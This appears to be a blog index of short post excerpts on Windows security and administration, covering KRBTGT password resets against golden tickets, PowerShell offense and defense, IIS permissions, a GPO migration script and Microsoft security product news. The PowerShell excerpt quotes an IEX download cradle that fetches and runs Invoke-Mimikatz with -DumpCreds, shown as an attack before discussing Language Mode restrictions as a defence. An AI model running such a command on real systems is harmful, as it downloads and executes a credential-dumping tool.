KRBTGT Account Password Reset – Security risk or operational risk?

February 15, 2018

Hi KRBTGT known as Key Distribution Center Service Account object whose Responsible for the service core of Active Directory. Now days we expose to so many cyber-attacks which include query and manipulation on KRBTGT user.   Pretty popular attack is golden ticket. Once an attacker has gained access to the KRBTGT account password hash, The attacker can create Golden Tickets. It is important to understand that any existing Golden Tickets will no longer be validate for use after changing the KRBTGT password twice rapidly. What would cause a lack of use existing tickets and removes the attacker ability to create valid Golden Tickets with their KRBTGT.     KRBTGT Account...
no comments

Windows Security Center – Service Vulnerable on client

February 14, 2018

Hi Microsoft has taken some steps on cyber-attacks in recent years. One of them was knowing how to get detailed and complete information from the client to the cloud, with the ability to know what the unusual actions were taking on the client. Windows Defender Security Center become the solution that manages Windows Defender ATP Client.   The client deployment and management capabilities are among the highest I've come across in all the distribution issues and the ability to disrupt that deployment. Service signature by certificate is the means that Microsoft has chosen to implement in order to prevent the user from interrupting or stopping...
no comments

PowerShell Offensive & Defensive View

February 12, 2018

Hi As we know PowerShell can be much more than a scripting platform, when it comes to administrative rights. Running unsigned process and scripts will serve the attacker to advance another step in to achieve the objective. Mimikatz and other painful tools detected by Antiviruses and Antimalware spot, but when they bypass , we are expose to one of the suspicious attacks in PowerShell today.   Using IEX cradle to get new file -  is one of them, Simply upload the PS script and run the following:   “IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds”     PowerShell can limit access to above command by using Language Mode   FullLanguage - permits all language elements...
no comments

Differences – IIS 8.5 — IIS 7.5 – Permissions Field

November 30, 2016

Hey, in the last recent days i was handle with iis permissions issue, while trying to send http request from iis application (windows server 2012 r2 IIS 8.5)  - I get an exception 401 unauthorized. (SSL Client Certificate Authentication) when i try to simulate it with different OS (2008 R2 IIS 7.5) - I get 200 OK & everything goes as expected. after a little research we reached to obtain a local admin to the application pool user to check if the following scenario related to a permissions field . and guess what? it's works as we verified  - application pool user identity needs...
tags:
no comments

Copy all GPOs from one forest to another

September 20, 2016

Hey, The following presents a PS Script that Copy all GPOs from one forest to another, Backed up all GPOs in one domain using Backup-GPO Imported them to the other forest by using Import-GPO Load the following Modules before run PS Script: Import-Module ActiveDirectory            Import-Module GroupPolicy    $sPath = "X:\GPOFOLDER" $list = get-childitem $sPath | Select name foreach ($item in $list) {     $fXML = $sPath + "\" + $item.Name + "\gpreport.xml"     $XMLData = (get-content $fXML)     $GPOName = $XMLData.GPO.Name     import-gpo -BackupId $item.Name -TargetName $GPOName -path $sPath -CreateIfNeeded }        
tags:
no comments

Azure Security Center Overview

March 28, 2016

Hey With Azure Security Center, you get a central view of the security state of all of your Azure resources. At a glance, verify that the appropriate security controls are in place and configured correctly. Scott talks to Sara Fender who explains it all :       Azure Security Center Overview              
tags:
no comments

Microsoft Security Critical Bulletin Release for March 2016

March 9, 2016

Hey Microsoft Security Critical Bulletin Release for March 2016     Bulletin Title MS16-028 Security Update for Microsoft Windows PDF Library to Address Remote Code Execution MS16-027 Security Update for Windows Media to Address Remote Code Execution MS16-026 Security Update for Graphic Fonts to Address Remote Code Execution MS16-024 Cumulative Security Update for Microsoft Edge MS16-023 Cumulative Security Update for Internet Explorer MS16-022 Security Update for Adobe Flash Player    
tags:
no comments

Announcing Windows Defender Advanced Threat Protection

March 1, 2016

Hey Today, Microsoft announce the next step in our efforts to protect enterprise customers, with a new service, Windows Defender Advanced Threat Protection, Windows Defender Advanced Threat Protection is powered by a combination of Windows behavioral sensors, cloud based security analytics, threat intelligence, and by tapping into Microsoft’s intelligent security graph. This immense security graph provides big-data security analytics that look across aggregate behaviors to identify anomalies – informed by anonymous information from over 1 billion Windows devices, 2.5 trillion indexed URLs on the Web, 600 million reputation look-ups online, and over 1 million suspicious files detonated every day.     Read More      
tags:
no comments

A complete solution for monitoring and protecting enterprise cloud apps

February 28, 2016

Hey Microsoft has a strong, ongoing commitment to help customers stay safe in a world with ever increasing threats from cyber criminals. As Satya announced last year and our Chief Information Security Officer (CISO) reiterated today, Microsoft is making huge investments to help Microsoft's customers stay secure.     Microsoft are excited to announce a new set of security solutions, Microsoft Cloud App Security and Azure AD Identity Protection that together give you a complete solution for monitoring and protecting enterprise cloud apps.     ITP Read More: a complete solution for monitoring and protecting enterprise cloud apps        
tags:
no comments